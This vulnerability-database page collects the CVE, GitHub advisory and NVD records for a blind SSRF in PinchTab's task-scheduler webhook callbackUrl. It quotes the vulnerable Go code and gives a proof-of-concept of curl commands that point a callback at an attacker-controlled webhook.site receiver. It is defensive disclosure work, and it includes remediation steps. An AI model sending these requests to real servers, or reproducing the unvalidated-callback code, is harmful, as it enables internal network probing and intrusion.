CVE-2026-33619 (GCVE-0-2026-33619)
Vulnerability from cvelistv5 – Published: 2026-03-26 20:34 – Updated: 2026-03-30 11:34
VLAI?
Title
PinchTab has Unauthenticated Blind SSRF in Task Scheduler via Unvalidated callbackUrl
Summary
PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab v0.8.3 contains a server-side request forgery issue in the optional scheduler's webhook delivery path. When a task is submitted to `POST /tasks` with a user-controlled `callbackUrl`, the v0.8.3 scheduler sends an outbound HTTP `POST` to that URL when the task reaches a terminal state. In that release, the webhook path validated only the URL scheme and did not reject loopback, private, link-local, or other non-public destinations. Because the v0.8.3 implementation also used the default HTTP client behavior, redirects were followed and the destination was not pinned to validated IPs. This allowed blind SSRF from the PinchTab server to attacker-chosen HTTP(S) targets reachable from the server. This issue is narrower than a general unauthenticated internet-facing SSRF. The scheduler is optional and off by default, and in token-protected deployments the attacker must already be able to submit tasks using the server's master API token. In PinchTab's intended deployment model, that token represents administrative control rather than a low-privilege role. Tokenless deployments lower the barrier further, but that is a separate insecure configuration state rather than impact created by the webhook bug itself. PinchTab's default deployment model is local-first and user-controlled, with loopback bind and token-based access in the recommended setup. That lowers practical risk in default use, even though it does not remove the underlying webhook issue when the scheduler is enabled and reachable. This was addressed in v0.8.4 by validating callback targets before dispatch, rejecting non-public IP ranges, pinning delivery to validated IPs, disabling redirect following, and validating `callbackUrl` during task submission.
Severity ?
4.1 (Medium)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33619",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-30T11:34:33.142945Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-30T11:34:43.286Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pinchtab",
"vendor": "pinchtab",
"versions": [
{
"status": "affected",
"version": "\u003c 0.8.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab v0.8.3 contains a server-side request forgery issue in the optional scheduler\u0027s webhook delivery path. When a task is submitted to `POST /tasks` with a user-controlled `callbackUrl`, the v0.8.3 scheduler sends an outbound HTTP `POST` to that URL when the task reaches a terminal state. In that release, the webhook path validated only the URL scheme and did not reject loopback, private, link-local, or other non-public destinations. Because the v0.8.3 implementation also used the default HTTP client behavior, redirects were followed and the destination was not pinned to validated IPs. This allowed blind SSRF from the PinchTab server to attacker-chosen HTTP(S) targets reachable from the server. This issue is narrower than a general unauthenticated internet-facing SSRF. The scheduler is optional and off by default, and in token-protected deployments the attacker must already be able to submit tasks using the server\u0027s master API token. In PinchTab\u0027s intended deployment model, that token represents administrative control rather than a low-privilege role. Tokenless deployments lower the barrier further, but that is a separate insecure configuration state rather than impact created by the webhook bug itself. PinchTab\u0027s default deployment model is local-first and user-controlled, with loopback bind and token-based access in the recommended setup. That lowers practical risk in default use, even though it does not remove the underlying webhook issue when the scheduler is enabled and reachable. This was addressed in v0.8.4 by validating callback targets before dispatch, rejecting non-public IP ranges, pinning delivery to validated IPs, disabling redirect following, and validating `callbackUrl` during task submission."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-26T20:34:01.661Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-xqq2-4j46-vwp7",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-xqq2-4j46-vwp7"
},
{
"name": "https://github.com/pinchtab/pinchtab/commit/c824574c3a05073dec2f5e9c219e22ffff8de445",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pinchtab/pinchtab/commit/c824574c3a05073dec2f5e9c219e22ffff8de445"
},
{
"name": "https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4"
}
],
"source": {
"advisory": "GHSA-xqq2-4j46-vwp7",
"discovery": "UNKNOWN"
},
"title": "PinchTab has Unauthenticated Blind SSRF in Task Scheduler via Unvalidated callbackUrl"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33619",
"datePublished": "2026-03-26T20:34:01.661Z",
"dateReserved": "2026-03-23T14:24:11.616Z",
"dateUpdated": "2026-03-30T11:34:43.286Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-33619\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-26T21:17:06.220\",\"lastModified\":\"2026-03-30T13:26:50.827\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab v0.8.3 contains a server-side request forgery issue in the optional scheduler\u0027s webhook delivery path. When a task is submitted to `POST /tasks` with a user-controlled `callbackUrl`, the v0.8.3 scheduler sends an outbound HTTP `POST` to that URL when the task reaches a terminal state. In that release, the webhook path validated only the URL scheme and did not reject loopback, private, link-local, or other non-public destinations. Because the v0.8.3 implementation also used the default HTTP client behavior, redirects were followed and the destination was not pinned to validated IPs. This allowed blind SSRF from the PinchTab server to attacker-chosen HTTP(S) targets reachable from the server. This issue is narrower than a general unauthenticated internet-facing SSRF. The scheduler is optional and off by default, and in token-protected deployments the attacker must already be able to submit tasks using the server\u0027s master API token. In PinchTab\u0027s intended deployment model, that token represents administrative control rather than a low-privilege role. Tokenless deployments lower the barrier further, but that is a separate insecure configuration state rather than impact created by the webhook bug itself. PinchTab\u0027s default deployment model is local-first and user-controlled, with loopback bind and token-based access in the recommended setup. That lowers practical risk in default use, even though it does not remove the underlying webhook issue when the scheduler is enabled and reachable. This was addressed in v0.8.4 by validating callback targets before dispatch, rejecting non-public IP ranges, pinning delivery to validated IPs, disabling redirect following, and validating `callbackUrl` during task submission.\"},{\"lang\":\"es\",\"value\":\"PinchTab es un servidor HTTP aut\u00f3nomo que otorga a los agentes de IA control directo sobre un navegador Chrome. PinchTab v0.8.3 contiene un problema de falsificaci\u00f3n de petici\u00f3n del lado del servidor en la ruta de entrega de webhook del programador opcional. Cuando se env\u00eda una tarea a \u0027POST /tasks\u0027 con una \u0027callbackUrl\u0027 controlada por el usuario, el programador v0.8.3 env\u00eda un \u0027POST\u0027 HTTP saliente a esa URL cuando la tarea alcanza un estado terminal. En esa versi\u00f3n, la ruta del webhook validaba solo el esquema de la URL y no rechazaba destinos de bucle invertido, privados, de enlace local u otros no p\u00fablicos. Debido a que la implementaci\u00f3n v0.8.3 tambi\u00e9n utilizaba el comportamiento predeterminado del cliente HTTP, se segu\u00edan las redirecciones y el destino no estaba fijado a IPs validadas. Esto permit\u00eda SSRF ciego desde el servidor PinchTab a objetivos HTTP(S) elegidos por el atacante accesibles desde el servidor. Este problema es m\u00e1s limitado que un SSRF general no autenticado y expuesto a internet. El programador es opcional y est\u00e1 desactivado por defecto, y en implementaciones protegidas por token el atacante ya debe ser capaz de enviar tareas utilizando el token maestro de la API del servidor. En el modelo de implementaci\u00f3n previsto de PinchTab, ese token representa control administrativo en lugar de un rol de bajo privilegio. Las implementaciones sin token reducen a\u00fan m\u00e1s la barrera, pero eso es un estado de configuraci\u00f3n inseguro separado en lugar del impacto creado por el propio error del webhook. El modelo de implementaci\u00f3n predeterminado de PinchTab es local-first y controlado por el usuario, con enlace de bucle invertido y acceso basado en token en la configuraci\u00f3n recomendada. Eso reduce el riesgo pr\u00e1ctico en el uso predeterminado, aunque no elimina el problema subyacente del webhook cuando el programador est\u00e1 habilitado y es accesible. Esto se abord\u00f3 en la v0.8.4 validando los objetivos de callback antes del env\u00edo, rechazando rangos de IP no p\u00fablicos, fijando la entrega a IPs validadas, deshabilitando el seguimiento de redirecciones y validando \u0027callbackUrl\u0027 durante el env\u00edo de tareas.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N\",\"baseScore\":4.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"references\":[{\"url\":\"https://github.com/pinchtab/pinchtab/commit/c824574c3a05073dec2f5e9c219e22ffff8de445\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-xqq2-4j46-vwp7\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33619\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-30T11:34:33.142945Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-30T11:34:39.355Z\"}}], \"cna\": {\"title\": \"PinchTab has Unauthenticated Blind SSRF in Task Scheduler via Unvalidated callbackUrl\", \"source\": {\"advisory\": \"GHSA-xqq2-4j46-vwp7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 4.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"pinchtab\", \"product\": \"pinchtab\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.8.4\"}]}], \"references\": [{\"url\": \"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-xqq2-4j46-vwp7\", \"name\": \"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-xqq2-4j46-vwp7\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/pinchtab/pinchtab/commit/c824574c3a05073dec2f5e9c219e22ffff8de445\", \"name\": \"https://github.com/pinchtab/pinchtab/commit/c824574c3a05073dec2f5e9c219e22ffff8de445\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4\", \"name\": \"https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab v0.8.3 contains a server-side request forgery issue in the optional scheduler\u0027s webhook delivery path. When a task is submitted to `POST /tasks` with a user-controlled `callbackUrl`, the v0.8.3 scheduler sends an outbound HTTP `POST` to that URL when the task reaches a terminal state. In that release, the webhook path validated only the URL scheme and did not reject loopback, private, link-local, or other non-public destinations. Because the v0.8.3 implementation also used the default HTTP client behavior, redirects were followed and the destination was not pinned to validated IPs. This allowed blind SSRF from the PinchTab server to attacker-chosen HTTP(S) targets reachable from the server. This issue is narrower than a general unauthenticated internet-facing SSRF. The scheduler is optional and off by default, and in token-protected deployments the attacker must already be able to submit tasks using the server\u0027s master API token. In PinchTab\u0027s intended deployment model, that token represents administrative control rather than a low-privilege role. Tokenless deployments lower the barrier further, but that is a separate insecure configuration state rather than impact created by the webhook bug itself. PinchTab\u0027s default deployment model is local-first and user-controlled, with loopback bind and token-based access in the recommended setup. That lowers practical risk in default use, even though it does not remove the underlying webhook issue when the scheduler is enabled and reachable. This was addressed in v0.8.4 by validating callback targets before dispatch, rejecting non-public IP ranges, pinning delivery to validated IPs, disabling redirect following, and validating `callbackUrl` during task submission.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-26T20:34:01.661Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-33619\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-30T11:34:43.286Z\", \"dateReserved\": \"2026-03-23T14:24:11.616Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-26T20:34:01.661Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-XQQ2-4J46-VWP7
Vulnerability from github – Published: 2026-03-24 19:32 – Updated: 2026-03-24 19:32
VLAI?
Summary
PinchTab has Unauthenticated Blind SSRF in Task Scheduler via Unvalidated callbackUrl
Details
Summary
PinchTab v0.8.3 contains a server-side request forgery issue in the optional scheduler's webhook delivery path. When a task is submitted to POST /tasks with a user-controlled callbackUrl, the v0.8.3 scheduler sends an outbound HTTP POST to that URL when the task reaches a terminal state. In that release, the webhook path validated only the URL scheme and did not reject loopback, private, link-local, or other non-public destinations.
Because the v0.8.3 implementation also used the default HTTP client behavior, redirects were followed and the destination was not pinned to validated IPs. This allowed blind SSRF from the PinchTab server to attacker-chosen HTTP(S) targets reachable from the server.
This issue is narrower than a general unauthenticated internet-facing SSRF. The scheduler is optional and off by default, and in token-protected deployments the attacker must already be able to submit tasks using the server's master API token. In PinchTab's intended deployment model, that token represents administrative control rather than a low-privilege role. Tokenless deployments lower the barrier further, but that is a separate insecure configuration state rather than impact created by the webhook bug itself.
PinchTab's default deployment model is local-first and user-controlled, with loopback bind and token-based access in the recommended setup. That lowers practical risk in default use, even though it does not remove the underlying webhook issue when the scheduler is enabled and reachable.
This was addressed in v0.8.4 by validating callback targets before dispatch, rejecting non-public IP ranges, pinning delivery to validated IPs, disabling redirect following, and validating callbackUrl during task submission.
Details
Issue 1 - Webhook dispatch validated only scheme in v0.8.3 (internal/scheduler/webhook.go):
The vulnerable sendWebhook() implementation accepted any http or https URL and dispatched the outbound request without destination IP validation:
// internal/scheduler/webhook.go - v0.8.3
parsed, err := url.Parse(callbackURL)
if parsed.Scheme != "http" && parsed.Scheme != "https" {
slog.Warn("webhook: unsupported scheme", ...)
return
}
req, _ := http.NewRequest(http.MethodPost, callbackURL, bytes.NewReader(payload))
resp, err := webhookClient.Do(req)
In v0.8.3 there was no hostname resolution and no rejection of loopback, private, link-local, or other non-public addresses before dispatch.
Issue 2 - callbackUrl was accepted without server-side validation in v0.8.3 (internal/scheduler/task.go):
The task submission schema accepted a user-controlled callbackUrl, and the v0.8.3 request validation logic did not validate it:
// internal/scheduler/task.go - v0.8.3
type SubmitRequest struct {
AgentID string `json:"agentId"`
Action string `json:"action"`
CallbackURL string `json:"callbackUrl,omitempty"`
}
func (r *SubmitRequest) Validate() error {
if r.AgentID == "" {
return fmt.Errorf("missing required field 'agentId'")
}
if r.Action == "" {
return fmt.Errorf("missing required field 'action'")
}
return nil
}
This meant a user-supplied callbackUrl flowed into webhook delivery without early rejection.
Issue 3 - Redirects were followed in v0.8.3:
The v0.8.3 webhook client used the default http.Client, so redirects were followed. That made the SSRF broader than the initially supplied URL alone, because an attacker-controlled external endpoint could redirect the server to a second destination.
PoC
Prerequisites
- PinchTab
v0.8.3 scheduler.enabled: truebecause the scheduler is off by default- The attacker can submit tasks to
POST /tasks - In token-protected deployments, this requires the master API token
- In deployments intentionally or accidentally running without a token, the barrier is lower, but that is separate from the webhook bug itself
- An attacker-controlled HTTP listener to receive and log the outbound request
Enable scheduler if required:
curl -s -X PUT http://TARGET:9867/api/config \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
-d '{"scheduler":{"enabled":true}}'
Restart PinchTab after changing config.
Execution
Submit a task with an attacker-controlled callbackUrl. A valid tabId is not required because the webhook fires for terminal task states, including failure:
curl -s -X POST http://TARGET:9867/tasks \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
-d '{
"agentId": "poc-agent",
"action": "navigate",
"params": {"url": "https://example.com"},
"callbackUrl": "https://webhook.site/c4030a47-259a-4ea4-ae34-fdbf96914b19"
}'
Confirm the task was accepted:
{
"createdAt": "2026-03-18T10:02:39.847097+07:00",
"position": 1,
"state": "queued",
"taskId": "tsk_2633324a"
}
Poll task state:
curl -s -H "Authorization: Bearer <token>" http://TARGET:9867/tasks/tsk_2633324a
Example result:
{
"taskId": "tsk_2633324a",
"state": "failed",
"error": "tabId is required for task execution",
"callbackUrl": "https://webhook.site/c4030a47-259a-4ea4-ae34-fdbf96914b19",
"completedAt": "2026-03-18T10:02:39.858043+07:00"
}
Query the attacker-controlled receiver for the inbound POST:
curl -s "https://webhook.site/token/c4030a47-259a-4ea4-ae34-fdbf96914b19/requests" \
| python3 -m json.tool
Observation 1. The task is accepted and reaches a terminal state. 2. The attacker-controlled receiver logs an inbound POST originating from the PinchTab server's egress address. 3. The webhook includes the task snapshot payload and PinchTab-specific headers, confirming server-side delivery. 4. In v0.8.3, the same dispatch path can be directed at internal or non-public HTTP targets reachable from the server. 5. This PoC demonstrates blind outbound request capability; it does not by itself demonstrate response-body disclosure or automatic cloud credential theft.
Impact
- Blind SSRF from the PinchTab server to attacker-chosen HTTP(S) targets when the optional scheduler is enabled and reachable.
- Potential interaction with internal HTTP services or metadata endpoints that are reachable from the server but not from the attacker directly.
- Limited direct confidentiality impact because the webhook is a fixed outbound POST and the response body is not returned to the attacker through the task API.
- Potential low-integrity impact where internal services accept unauthenticated POST requests and perform state-changing actions.
- Practical risk is lower in the documented default local-first deployment model, where loopback bind, generated tokens, and a disabled scheduler reduce exposure.
Suggested Remediation
Apply the same outbound destination controls used for safer HTTP egress paths to scheduler webhook delivery. Specifically:
- Resolve the hostname of
callbackUrlbefore dispatch and reject loopback, private, link-local, multicast, unspecified, and other non-public IP ranges. - Pin delivery to the validated IP set instead of relying on fresh DNS resolution during connect.
- Reject redirects or re-validate every redirect target before following it.
- Validate
callbackUrlduring task submission so unsafe targets fail early instead of only at delivery time. - Optionally add an allowlist for approved webhook destinations if operators need narrowly scoped internal receivers.
Evidence Capture
Exploit
Verify
Severity ?
4.1 (Medium)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.8.3"
},
"package": {
"ecosystem": "Go",
"name": "github.com/pinchtab/pinchtab"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33619"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-24T19:32:21Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nPinchTab v0.8.3 contains a server-side request forgery issue in the optional scheduler\u0027s webhook delivery path. When a task is submitted to `POST /tasks` with a user-controlled `callbackUrl`, the v0.8.3 scheduler sends an outbound HTTP `POST` to that URL when the task reaches a terminal state. In that release, the webhook path validated only the URL scheme and did not reject loopback, private, link-local, or other non-public destinations.\n\nBecause the v0.8.3 implementation also used the default HTTP client behavior, redirects were followed and the destination was not pinned to validated IPs. This allowed blind SSRF from the PinchTab server to attacker-chosen HTTP(S) targets reachable from the server.\n\nThis issue is narrower than a general unauthenticated internet-facing SSRF. The scheduler is optional and off by default, and in token-protected deployments the attacker must already be able to submit tasks using the server\u0027s master API token. In PinchTab\u0027s intended deployment model, that token represents administrative control rather than a low-privilege role. Tokenless deployments lower the barrier further, but that is a separate insecure configuration state rather than impact created by the webhook bug itself.\n\nPinchTab\u0027s default deployment model is local-first and user-controlled, with loopback bind and token-based access in the recommended setup. That lowers practical risk in default use, even though it does not remove the underlying webhook issue when the scheduler is enabled and reachable.\n\nThis was addressed in v0.8.4 by validating callback targets before dispatch, rejecting non-public IP ranges, pinning delivery to validated IPs, disabling redirect following, and validating `callbackUrl` during task submission.\n\n### Details\n**Issue 1 - Webhook dispatch validated only scheme in v0.8.3 (`internal/scheduler/webhook.go`):**\nThe vulnerable `sendWebhook()` implementation accepted any `http` or `https` URL and dispatched the outbound request without destination IP validation:\n\n```go\n// internal/scheduler/webhook.go - v0.8.3\nparsed, err := url.Parse(callbackURL)\nif parsed.Scheme != \"http\" \u0026\u0026 parsed.Scheme != \"https\" {\n slog.Warn(\"webhook: unsupported scheme\", ...)\n return\n}\n\nreq, _ := http.NewRequest(http.MethodPost, callbackURL, bytes.NewReader(payload))\nresp, err := webhookClient.Do(req)\n```\n\nIn v0.8.3 there was no hostname resolution and no rejection of loopback, private, link-local, or other non-public addresses before dispatch.\n\n**Issue 2 - `callbackUrl` was accepted without server-side validation in v0.8.3 (`internal/scheduler/task.go`):**\nThe task submission schema accepted a user-controlled `callbackUrl`, and the v0.8.3 request validation logic did not validate it:\n\n```go\n// internal/scheduler/task.go - v0.8.3\ntype SubmitRequest struct {\n AgentID string `json:\"agentId\"`\n Action string `json:\"action\"`\n CallbackURL string `json:\"callbackUrl,omitempty\"`\n}\n\nfunc (r *SubmitRequest) Validate() error {\n if r.AgentID == \"\" {\n return fmt.Errorf(\"missing required field \u0027agentId\u0027\")\n }\n if r.Action == \"\" {\n return fmt.Errorf(\"missing required field \u0027action\u0027\")\n }\n return nil\n}\n```\n\nThis meant a user-supplied `callbackUrl` flowed into webhook delivery without early rejection.\n\n**Issue 3 - Redirects were followed in v0.8.3:**\nThe v0.8.3 webhook client used the default `http.Client`, so redirects were followed. That made the SSRF broader than the initially supplied URL alone, because an attacker-controlled external endpoint could redirect the server to a second destination.\n\n### PoC\n**Prerequisites**\n\n- PinchTab `v0.8.3`\n- `scheduler.enabled: true` because the scheduler is off by default\n- The attacker can submit tasks to `POST /tasks`\n- In token-protected deployments, this requires the master API token\n- In deployments intentionally or accidentally running without a token, the barrier is lower, but that is separate from the webhook bug itself\n- An attacker-controlled HTTP listener to receive and log the outbound request\n\nEnable scheduler if required:\n\n```bash\ncurl -s -X PUT http://TARGET:9867/api/config \\\n -H \"Authorization: Bearer \u003ctoken\u003e\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"scheduler\":{\"enabled\":true}}\u0027\n```\n\nRestart PinchTab after changing config.\n\n**Execution**\nSubmit a task with an attacker-controlled `callbackUrl`. A valid `tabId` is not required because the webhook fires for terminal task states, including failure:\n\n```bash\ncurl -s -X POST http://TARGET:9867/tasks \\\n -H \"Authorization: Bearer \u003ctoken\u003e\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\n \"agentId\": \"poc-agent\",\n \"action\": \"navigate\",\n \"params\": {\"url\": \"https://example.com\"},\n \"callbackUrl\": \"https://webhook.site/c4030a47-259a-4ea4-ae34-fdbf96914b19\"\n }\u0027\n```\n\nConfirm the task was accepted:\n\n```json\n{\n \"createdAt\": \"2026-03-18T10:02:39.847097+07:00\",\n \"position\": 1,\n \"state\": \"queued\",\n \"taskId\": \"tsk_2633324a\"\n}\n```\n\nPoll task state:\n\n```bash\ncurl -s -H \"Authorization: Bearer \u003ctoken\u003e\" http://TARGET:9867/tasks/tsk_2633324a\n```\n\nExample result:\n\n```json\n{\n \"taskId\": \"tsk_2633324a\",\n \"state\": \"failed\",\n \"error\": \"tabId is required for task execution\",\n \"callbackUrl\": \"https://webhook.site/c4030a47-259a-4ea4-ae34-fdbf96914b19\",\n \"completedAt\": \"2026-03-18T10:02:39.858043+07:00\"\n}\n```\n\nQuery the attacker-controlled receiver for the inbound POST:\n\n```bash\ncurl -s \"https://webhook.site/token/c4030a47-259a-4ea4-ae34-fdbf96914b19/requests\" \\\n | python3 -m json.tool\n```\n\n**Observation**\n1. The task is accepted and reaches a terminal state.\n2. The attacker-controlled receiver logs an inbound POST originating from the PinchTab server\u0027s egress address.\n3. The webhook includes the task snapshot payload and PinchTab-specific headers, confirming server-side delivery.\n4. In v0.8.3, the same dispatch path can be directed at internal or non-public HTTP targets reachable from the server.\n5. This PoC demonstrates blind outbound request capability; it does not by itself demonstrate response-body disclosure or automatic cloud credential theft.\n\n### Impact\n1. Blind SSRF from the PinchTab server to attacker-chosen HTTP(S) targets when the optional scheduler is enabled and reachable.\n2. Potential interaction with internal HTTP services or metadata endpoints that are reachable from the server but not from the attacker directly.\n3. Limited direct confidentiality impact because the webhook is a fixed outbound POST and the response body is not returned to the attacker through the task API.\n4. Potential low-integrity impact where internal services accept unauthenticated POST requests and perform state-changing actions.\n5. Practical risk is lower in the documented default local-first deployment model, where loopback bind, generated tokens, and a disabled scheduler reduce exposure.\n\n### Suggested Remediation\nApply the same outbound destination controls used for safer HTTP egress paths to scheduler webhook delivery. Specifically:\n\n1. Resolve the hostname of `callbackUrl` before dispatch and reject loopback, private, link-local, multicast, unspecified, and other non-public IP ranges.\n2. Pin delivery to the validated IP set instead of relying on fresh DNS resolution during connect.\n3. Reject redirects or re-validate every redirect target before following it.\n4. Validate `callbackUrl` during task submission so unsafe targets fail early instead of only at delivery time.\n5. Optionally add an allowlist for approved webhook destinations if operators need narrowly scoped internal receivers.\n\n### Evidence Capture\n**Exploit**\n\n\u003cimg width=\"2864\" height=\"1387\" alt=\"new\" src=\"https://github.com/user-attachments/assets/b7b5cf31-c463-4e25-adff-fc8798f1f33b\" /\u003e\n\n**Verify**\n\n\u003cimg width=\"2866\" height=\"1474\" alt=\"web\" src=\"https://github.com/user-attachments/assets/65391b00-8df5-4c3c-8789-eb100f65b301\" /\u003e",
"id": "GHSA-xqq2-4j46-vwp7",
"modified": "2026-03-24T19:32:21Z",
"published": "2026-03-24T19:32:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-xqq2-4j46-vwp7"
},
{
"type": "WEB",
"url": "https://github.com/pinchtab/pinchtab/commit/c824574c3a05073dec2f5e9c219e22ffff8de445"
},
{
"type": "PACKAGE",
"url": "https://github.com/pinchtab/pinchtab"
},
{
"type": "WEB",
"url": "https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "PinchTab has Unauthenticated Blind SSRF in Task Scheduler via Unvalidated callbackUrl"
}
FKIE_CVE-2026-33619
Vulnerability from fkie_nvd - Published: 2026-03-26 21:17 - Updated: 2026-03-30 13:26
Severity ?
Summary
PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab v0.8.3 contains a server-side request forgery issue in the optional scheduler's webhook delivery path. When a task is submitted to `POST /tasks` with a user-controlled `callbackUrl`, the v0.8.3 scheduler sends an outbound HTTP `POST` to that URL when the task reaches a terminal state. In that release, the webhook path validated only the URL scheme and did not reject loopback, private, link-local, or other non-public destinations. Because the v0.8.3 implementation also used the default HTTP client behavior, redirects were followed and the destination was not pinned to validated IPs. This allowed blind SSRF from the PinchTab server to attacker-chosen HTTP(S) targets reachable from the server. This issue is narrower than a general unauthenticated internet-facing SSRF. The scheduler is optional and off by default, and in token-protected deployments the attacker must already be able to submit tasks using the server's master API token. In PinchTab's intended deployment model, that token represents administrative control rather than a low-privilege role. Tokenless deployments lower the barrier further, but that is a separate insecure configuration state rather than impact created by the webhook bug itself. PinchTab's default deployment model is local-first and user-controlled, with loopback bind and token-based access in the recommended setup. That lowers practical risk in default use, even though it does not remove the underlying webhook issue when the scheduler is enabled and reachable. This was addressed in v0.8.4 by validating callback targets before 